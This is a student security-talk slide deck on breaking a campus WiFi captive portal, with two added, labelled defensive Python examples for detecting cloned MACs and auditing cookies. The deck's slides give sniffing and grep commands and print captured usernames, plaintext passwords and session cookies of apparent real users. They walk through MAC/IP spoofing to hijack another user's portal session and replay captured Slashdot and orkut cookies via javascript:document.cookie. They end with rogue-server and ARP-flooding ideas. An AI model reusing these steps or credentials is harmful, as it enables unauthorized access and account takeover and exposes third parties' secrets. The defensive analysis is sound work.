Smit WiFi_2

1. Down the rabbit-hole
   - a sneak peek at the SMIT-WiFi implementation
   - Amit Saraff
   - Ashish Shekhar

2. Tools Used
   - Nmap – network scanner
   - Wireshark / Ethereal – packet analyzer
   - Kismet – wireless sniffer
   - BurpSuite – proxy (HTTP header modifier)
   - Firefox – web browser
     - Live HTTP Headers
     - User Agent Switcher
     - Tamper Data
     - View Cookie CS
     - NoScript
   - Unix tools – wget, curl, ssh, ifconfig etc.
   - Intel Centrino-based laptop running Slackware 9

3. Brief Overview
   - IP range: 172.16.183.0/22
   - WEP / WPA – no (yes !!)
   - 4 different ESSIDs:
     - SMITWiFi1
     - SMITWiFi2
     - SMITWiFi3
     - SMITWiFi4
     - different ESSIDs / same channel ??

4. Brief Overview (cont.)
   - 172.16.183.1 – router / DNS resolver / authenticator
   - 172.16.183.2 – 802.11b access point
   - 172.16.183.3 – D-Link DWL-900 AP+ (standard 802.11bg AP)
   - 172.16.183.4 – (new) another access point?

5. Initial Monitoring
   - E-mail accounts
     - [email_address]
     - [email_address]
     - [email_address]
     - [email_address]
     - [email_address]
     - [email_address]
     - [email_address]
     - [email_address]

6. Initial Monitoring (cont.)
   - and web addresses
     - www.orkut.com
     - www.cisco.com
     - www.wipro.com
     - www.musicgamesrefer.com
     - www.grisoft.com
     - www.yahoo.com
     - and some more orkut !!

7. But that's not what we are looking for !!

8. Wall of Sheep
   IP               MAC                User   Password
   172.16.183.15    00:12:f0:db:ef:6f  d205a  m_-_-i
   172.16.183.23    00:12:f0:64:0a:67  g205a  b_-_i
   172.16.183.78    00:13:ce:7b:d7:9b  d108a  1_3
   172.16.183.116   00:16:ce:54:69:48  b206a  j_-n
   172.16.183.117   00:12:f0:56:b7:3f  k205a  n_-_-_-w
   172.16.183.149   00:15:00:22:c4:0f  l205a  p_-_-_-_4
   172.16.183.155   00:13:02:43:2b:0d  r305a  r_-_-_a
   172.16.183.180   00:12:f0:51:3b:e0  j301a  h_-_-_-a
   ** and this is just a small part of the list
   How about some user account details?

9. So how did this happen?

10. 172.16.183.1 – Authentication Server

11. Talk about multi-platform support

12. User Agent Switcher to the rescue

13. Background magic – how it really works

14. How hard is it?
   - Log the network traffic using Kismet
   - and run:
     strings Kismet*.dump | grep Cookie | egrep "_Pass=[a-zA-Z0-9]+;"
   - to get:
     Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
     Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

15. But that isn't very ethical
   - Problem – how to get access to the internet without compromising another's account?
   - Solution – study the entire process and find a work-around.

16. Brief Introduction to Cookies (no, not these "cookies")

17. So what are they?
   - Parcels of text sent by a server to a web browser and then sent back unchanged by the browser each time it accesses the server.
   - Used for authenticating, tracking and maintaining specific information about users.
   - We saw an example 2-3 slides back. For those who "missed it", here it is again:
     Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

18. How do they help?
   - The SMIT server sets a cookie on each client it authenticates.
   - It refreshes the cookie every 180 seconds.
   - How do I then get this cookie?
   - And how will it help even if I do manage to capture it?

19. Step 1 – Find active hosts on the network: enter 'Kismet'

20. Step 1 (cont.)

21. Step 2 – Select an active host and note its parameters, i.e. IP address and MAC address.

22. Step 2 (cont.) – Change settings locally to match the host about to be compromised. For example:
     ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4
     route add default gw 172.16.183.1

23. Step 3
   - Fire up your browser – Firefox in our case.
   - Type in the following URL:
     http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null
   - This acts as a 'refresh' command to the server, which replies with the validated cookie.

24. ..to get

25. ..and we are online

26. Step 3 (cont.)
   - What this does:
     - Sets you up with the "cookie"
     - Refreshes itself every 180 seconds
     - Voila, you have free internet access (until the guy logs off / you log him off)
   - Node goes offline?
     - Rinse and repeat the entire process with another IP.
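
The portal in Steps 1 to 3 trusts a client by its IP and MAC address, so the attack boils down to copying a live client's addresses onto a second machine. From the defender's side that copy is detectable at the radio layer. The example below is added here and is not code from the deck or its authors: it applies 802.11 sequence-number analysis. A single radio increments its 12-bit sequence counter by one per transmitted frame, so two stations transmitting under one MAC show up on a monitor interface as two interleaved counters. The two MAC addresses are taken from the deck's tables (lower-cased); the frame records, the tolerance `max_gap` and the `min_hits` threshold are constructed for the example and are not real captures or vendor defaults.

```python
"""Detecting a cloned station MAC from 802.11 sequence numbers (added example)."""
from collections import Counter

SEQ_MODULUS = 4096   # the 802.11 sequence-control field carries a 12-bit sequence number


def forward_distance(prev_seq: int, cur_seq: int) -> int:
    """Distance from prev_seq to cur_seq walking forward modulo 4096.
    A normal wrap (4095 -> 0) gives 1; a jump backwards shows up as a large number."""
    return (cur_seq - prev_seq) % SEQ_MODULUS


def detect_cloned_macs(frames, max_gap=256, min_hits=3):
    """frames: iterable of (timestamp, src_mac, seq_num, is_retry) records from a monitor
    interface. Returns {mac: anomaly_count} for addresses whose sequence numbers run
    backwards (or leap forwards beyond max_gap) at least min_hits times: two radios
    sharing one MAC interleave two independent counters. max_gap and min_hits are
    assumed tuning values; max_gap absorbs frames the monitor simply did not hear."""
    last_seq = {}
    anomalies = Counter()
    for _ts, mac, seq, is_retry in sorted(frames, key=lambda f: f[0]):
        if is_retry:
            continue                 # a retransmission legitimately repeats the last number
        if mac in last_seq:
            gap = forward_distance(last_seq[mac], seq)
            if gap == 0 or gap > max_gap:
                anomalies[mac] += 1
        last_seq[mac] = seq
    return {mac: n for mac, n in anomalies.items() if n >= min_hits}


# MACs taken from the deck; the frame records below are constructed, not captures
LEGIT = "00:12:f0:db:ef:6f"     # one radio behind this address
CLONED = "00:13:02:c1:28:d4"    # the address the deck shows being copied onto a second machine


def build_sample_frames():
    """Constructed monitor-mode records: one well-behaved station and one cloned address."""
    frames = []
    # LEGIT: one counter running 4090..4095, wrapping cleanly to 0..5
    for i, seq in enumerate(list(range(4090, 4096)) + list(range(0, 6))):
        frames.append((i * 0.01, LEGIT, seq, False))
    # CLONED: the real client counts from 100 while a second station counts from 3000
    real, other = 100, 3000
    for i in range(12):
        if i % 2 == 0:
            frames.append((i * 0.01, CLONED, real, False))
            real += 1
        else:
            frames.append((i * 0.01, CLONED, other, False))
            other += 1
    # a retry from LEGIT repeats sequence number 5 and must not be counted
    frames.append((0.5, LEGIT, 5, True))
    return frames


if __name__ == "__main__":
    print(detect_cloned_macs(build_sample_frames()))   # {'00:13:02:c1:28:d4': 11}
```

The check is cheap enough to run on a live Kismet or tcpdump feed, but it only sees the clone while both stations transmit; once the original client logs off, the portal's IP/MAC trust model gives nothing further to detect, which is why the real fix is link-layer encryption (WPA2) plus a session token that never crosses the air in clear.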

27. Return to cookie-land
   - Authentication mechanisms
     - We just saw an abuse of the implicit trust mechanism guaranteed by cookies
     - But that was local
     - Can it be extended to other sites too?

28. Presenting Slashdot
   - Popular technology portal.
   - News site for anything regarding Technology / Linux / Politics / Science / YRO (Your Rights Online) and more.
   - Uses the HTTP POST mechanism for sending authentication data.

29. The main page

30. Login page

31. Cookie

32. Exploit
   - To authenticate as that user, simply capture the incoming cookie
   - Then in the address bar type in:
     javascript:document.cookie='user=609178::Ik2zsyez qK6AIER7rLuyD7; Domain=.slashdot.org; Path=/';

33. Result?

34. So what? But then that is hardly any sweat !!

35. Moving on – orkut.com
   - What is orkut?
     - Social networking site.
     - Online community to meet new people and keep in touch with old ones.
     - Now part of the Google empire.
     - On in "at least" 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.

36. Main page

37. First observations
   - Note:
     - The address bar is yellow and there is a lock sign on the taskbar.
     - What it means:
       - Site uses Secure HTTP (port 443 / https)
       - Certificate for validation (AES-256 bit encryption)
       - Trusted certificate issuer – Thawte Consulting cc.
     - Actual login frame URL:
       https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvpage=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

38. In other words – that information is definitely not being cracked anytime soon.

39. Cookies, again?
   - Cookie generated on login:

40. Cookies, again? (cont.)
   - 2 cookies set by the orkut domain
     - First one seems to be a user preference cookie
     - Second one is for timezone (??)

41. Cookie (1)
   - Question: Does Cookie 1 alone do the trick then?
   - Solution: Grab another cookie and check.

42. Back to kismet dumps
   - Hunt for a cookie in the previously gathered logs:
     strings Kismet-*dump | grep Cookie | grep -i orkut
   - To get:
     Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

43. Set this cookie
     javascript:document.cookie='orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com; Path=/';
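
Slides 17 and 18 describe the SMIT cookie, and slides 32 and 43 show browser-side replay of Slashdot and orkut cookies captured off the air. The example below is added here and is not code from the deck, from the portal vendor or from any of the sites involved. It audits `Set-Cookie` and `Cookie` headers for the properties that made those replays cheap (a password stored in the cookie, no `Secure` flag so the value crosses the open WLAN in clear, `HttpOnly` missing, a `Domain` attribute shared across subdomains, a guessable value) and contrasts them with how a captive portal should issue a session: a random opaque token whose mapping to the user lives server-side, `Secure` and `HttpOnly`, and a lifetime equal to the deck's 180-second refresh interval. The sample headers are constructed from the cookies shown on the slides; the entropy threshold, the name heuristic and the `portal_session` cookie name are assumptions.

```python
"""Cookie hygiene audit and a hardened portal session cookie (added example)."""
import math
import re
import secrets
from collections import Counter

# Cookie names that suggest a password is being stored client-side (constructed heuristic)
SECRET_IN_NAME = re.compile(r"pass|pwd|secret", re.IGNORECASE)
# Assumed minimum estimated entropy for a session identifier, in bits
MIN_TOKEN_BITS = 64


def shannon_bits(value: str) -> float:
    """Rough entropy estimate: per-character Shannon entropy times the value's length."""
    n = len(value)
    if n == 0:
        return 0.0
    return n * -sum((c / n) * math.log2(c / n) for c in Counter(value).values())


def parse_set_cookie(header: str):
    """Split 'Set-Cookie: name=value; Attr=val; Flag' into (name, value, {attr_lower: val})."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    pieces = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str) -> list:
    """Return the weaknesses a reviewer would flag for one Set-Cookie header."""
    name, value, attrs = parse_set_cookie(header)
    issues = []
    if SECRET_IN_NAME.search(name):
        issues.append("stores a password on the client instead of an opaque session id")
    elif shannon_bits(value) < MIN_TOKEN_BITS:
        issues.append("value is short or repetitive enough to guess")
    if "secure" not in attrs:
        issues.append("no Secure flag: sent over plaintext HTTP, readable by any sniffer")
    if "httponly" not in attrs:
        issues.append("no HttpOnly flag: readable by page scripts")
    if attrs.get("domain", "").startswith("."):
        issues.append(f"Domain={attrs['domain']} scopes it to every subdomain")
    return issues


def audit_cookie_request(header: str) -> list:
    """Audit a 'Cookie:' request header as captured on the wire (no attributes present)."""
    issues = []
    for piece in header.split(":", 1)[1].split(";"):
        name, _, _value = piece.strip().partition("=")
        if SECRET_IN_NAME.search(name):
            issues.append(f"{name} carries a password in clear text")
    return issues


SESSIONS = {}   # server-side store, token -> username (stand-in for the portal's database)


def issue_session_cookie(username: str, ttl_seconds: int = 180) -> str:
    """How a portal should set its session: random opaque id, identity kept server-side,
    Secure + HttpOnly + SameSite, lifetime equal to the deck's 180 s refresh interval.
    The cookie name portal_session is an assumption."""
    token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
    SESSIONS[token] = username
    return (f"Set-Cookie: portal_session={token}; Max-Age={ttl_seconds}; Path=/; "
            "Secure; HttpOnly; SameSite=Strict")


def lookup_session(header: str):
    """Resolve a presented cookie to a user without ever trusting a username in the cookie."""
    for piece in header.split(":", 1)[1].split(";"):
        name, _, value = piece.strip().partition("=")
        if name == "portal_session":
            return SESSIONS.get(value)
    return None


# Sample headers constructed from the cookies shown on the slides
SMIT_REQUEST = "Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293"
SMIT_SET_PASS = "Set-Cookie: _Pass=123; Path=/"
BROAD_DOMAIN = "Set-Cookie: sid=k8Qz3v1pR7mN2aX9bC4dE6fG; Domain=.example.org; Path=/; Secure; HttpOnly"

if __name__ == "__main__":
    for hdr in (SMIT_SET_PASS, BROAD_DOMAIN, issue_session_cookie("m301a")):
        print(hdr[:60], "->", audit_set_cookie(hdr) or "clean")
    print(SMIT_REQUEST[:40], "->", audit_cookie_request(SMIT_REQUEST))
```

Note what each flag does and does not buy. `Secure` together with an HTTPS portal keeps the value off the wire; on an open WLAN the link itself still needs WPA2 so that the rest of the traffic is not readable either. `HttpOnly` stops page scripts from reading the cookie but does nothing against replay of a value captured on the network, which is the path this deck follows; for that, the token must be short-lived, transported only over an encrypted channel, and invalidated server-side on logout.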

44. To get: Notice self-post!

45. Future possibilities?
   - Set up an HTTP server and masquerade as 172.16.183.1 in order to capture logins.
   - Attack the hardware itself (vulnerabilities in the server / access points).
   - Ban certain clients from access (ARP flooding).
   - Put the laptop in "Master" mode to route traffic through it.

46. Thank you. Questions?
